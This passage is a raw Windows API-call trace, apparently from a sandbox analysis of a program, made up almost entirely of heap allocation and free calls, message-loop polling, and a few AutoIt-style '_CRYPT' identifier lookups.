(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0183.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0183.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0183.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0183.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0183.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0183.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0183.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0183.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0183.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0183.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x1272020 [0183.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x11a3020 | out: hHeap=0x970000) returned 1 [0183.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0183.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0183.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0183.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0183.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0183.333] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0183.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0183.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0183.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0183.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0183.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0183.335] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0183.335] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0183.335] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0183.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0183.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0183.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0183.336] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0183.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0183.336] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0183.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0183.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0183.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0183.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0183.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0183.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x134b020 [0183.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0183.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x142b020 [0183.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0183.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x134b020 | out: hHeap=0x970000) returned 1 [0183.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0183.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0183.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x134e020 [0183.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x142b020 | out: hHeap=0x970000) returned 1 [0183.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0183.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0183.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x11a8020 [0183.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x134e020 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0183.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0183.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0183.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0183.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0183.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0183.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0183.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0183.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x10cf020 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0183.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xff4020 | out: hHeap=0x970000) returned 1 [0183.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0183.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0183.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0183.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0183.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0183.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1272020 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0183.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf21020 | out: hHeap=0x970000) returned 1 [0183.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0183.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0183.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0183.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0183.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0183.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0183.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0183.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0x970000) returned 1 [0183.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0183.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0183.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0xe5f020 [0183.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x11a8020 | out: hHeap=0x970000) returned 1 [0183.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0183.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0183.645] TranslateMessage (lpMsg=0x8cf708) returned 0 [0183.645] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0183.645] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0183.645] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0183.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0183.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0183.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0183.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0183.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0183.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 